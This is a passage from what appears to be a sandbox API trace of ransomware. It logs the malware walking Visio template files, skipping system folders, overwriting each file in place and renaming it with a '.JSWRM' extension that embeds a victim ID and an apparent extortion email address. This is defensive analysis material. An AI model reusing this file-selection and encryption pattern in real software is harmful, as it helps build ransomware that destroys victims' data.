ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3b5ed86, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xb361, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASFLO_U.VSSX", cAlternateFileName="BASFLO~2.VSS")) returned 1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2=".") returned 1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2="..") returned 1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2="...") returned 1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2="windows") returned -1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2="recovery") returned -1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2="perflogs") returned -1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2="documents and settings") returned -1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2="system volume information") returned -1 [0144.438] lstrcmpiW (lpString1="BASFLO_U.VSSX", lpString2="msocache") returned -1 [0144.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASFLO_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASFLO_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.439] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=45921) returned 1 [0144.439] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.439] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb360, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb360, lpOverlapped=0x0) returned 1 [0144.444] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.444] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb360, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb360, lpOverlapped=0x0) returned 1 [0144.444] CloseHandle (hObject=0x314) returned 1 [0144.444] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.446] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x493a87e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x493a87e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x493a87e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4a13, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASFLO_U.VSTX", cAlternateFileName="BASFLO~2.VST")) returned 1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2=".") returned 1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2="..") returned 1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2="...") returned 1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2="windows") returned -1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2="recovery") returned -1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2="perflogs") returned -1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2="documents and settings") returned -1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2="system volume information") returned -1 [0144.446] lstrcmpiW (lpString1="BASFLO_U.VSTX", lpString2="msocache") returned -1 [0144.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASFLO_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0144.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASFLO_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASFLO_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0144.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.447] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=18963) returned 1 [0144.447] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.447] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4a10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4a10, lpOverlapped=0x0) returned 1 [0144.450] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.450] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4a10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4a10, lpOverlapped=0x0) returned 1 [0144.450] CloseHandle (hObject=0x314) returned 1 [0144.450] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASFLO_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basflo_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.451] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x10844, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASICCIRCUIT_DIAGRAM_M.VSTX", cAlternateFileName="BASICC~1.VST")) returned 1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2=".") returned 1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2="..") returned 1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2="...") returned 1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2="windows") returned -1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2="recovery") returned -1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2="perflogs") returned -1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2="documents and settings") returned -1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2="system volume information") returned -1 [0144.451] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_M.VSTX", lpString2="msocache") returned -1 [0144.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICCIRCUIT_DIAGRAM_M.VSTX", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0144.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICCIRCUIT_DIAGRAM_M.VSTX", cchWideChar=27, lpMultiByteStr=0x241178, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICCIRCUIT_DIAGRAM_M.VSTX", lpUsedDefaultChar=0x0) returned 27 [0144.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICCIRCUIT_DIAGRAM_M.VSTX", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0144.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICCIRCUIT_DIAGRAM_M.VSTX", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICCIRCUIT_DIAGRAM_M.VSTX", lpUsedDefaultChar=0x0) returned 27 [0144.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICCIRCUIT_DIAGRAM_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basiccircuit_diagram_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.453] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=67652) returned 1 [0144.453] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.453] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10840, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x10840, lpOverlapped=0x0) returned 1 [0144.459] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.459] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10840, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x10840, lpOverlapped=0x0) returned 1 [0144.459] CloseHandle (hObject=0x314) returned 1 [0144.459] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICCIRCUIT_DIAGRAM_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basiccircuit_diagram_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICCIRCUIT_DIAGRAM_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basiccircuit_diagram_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.461] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x10130, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASICCIRCUIT_DIAGRAM_U.VSTX", cAlternateFileName="BASICC~2.VST")) returned 1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2=".") returned 1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2="..") returned 1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2="...") returned 1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2="windows") returned -1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2="recovery") returned -1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2="perflogs") returned -1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2="documents and settings") returned -1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2="system volume information") returned -1 [0144.461] lstrcmpiW (lpString1="BASICCIRCUIT_DIAGRAM_U.VSTX", lpString2="msocache") returned -1 [0144.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICCIRCUIT_DIAGRAM_U.VSTX", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0144.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICCIRCUIT_DIAGRAM_U.VSTX", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICCIRCUIT_DIAGRAM_U.VSTX", lpUsedDefaultChar=0x0) returned 27 [0144.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICCIRCUIT_DIAGRAM_U.VSTX", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0144.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICCIRCUIT_DIAGRAM_U.VSTX", cchWideChar=27, lpMultiByteStr=0x241380, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICCIRCUIT_DIAGRAM_U.VSTX", lpUsedDefaultChar=0x0) returned 27 [0144.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICCIRCUIT_DIAGRAM_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basiccircuit_diagram_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.462] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=65840) returned 1 [0144.462] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.463] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10130, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x10130, lpOverlapped=0x0) returned 1 [0144.469] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.469] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10130, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x10130, lpOverlapped=0x0) returned 1 [0144.470] CloseHandle (hObject=0x314) returned 1 [0144.470] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICCIRCUIT_DIAGRAM_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basiccircuit_diagram_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICCIRCUIT_DIAGRAM_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basiccircuit_diagram_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.471] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x18ccc9d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x447e, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASICD_M.VSTX", cAlternateFileName="BASICD~1.VST")) returned 1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2=".") returned 1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2="..") returned 1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2="...") returned 1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2="windows") returned -1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2="recovery") returned -1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2="perflogs") returned -1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2="documents and settings") returned -1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2="system volume information") returned -1 [0144.471] lstrcmpiW (lpString1="BASICD_M.VSTX", lpString2="msocache") returned -1 [0144.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICD_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0144.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICD_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0144.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICD_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicd_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.472] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=17534) returned 1 [0144.472] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.472] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4470, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4470, lpOverlapped=0x0) returned 1 [0144.479] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.479] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4470, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4470, lpOverlapped=0x0) returned 1 [0144.480] CloseHandle (hObject=0x314) returned 1 [0144.480] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICD_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicd_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICD_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicd_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.481] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x16908c8, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4409, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASICD_U.VSTX", cAlternateFileName="BASICD~2.VST")) 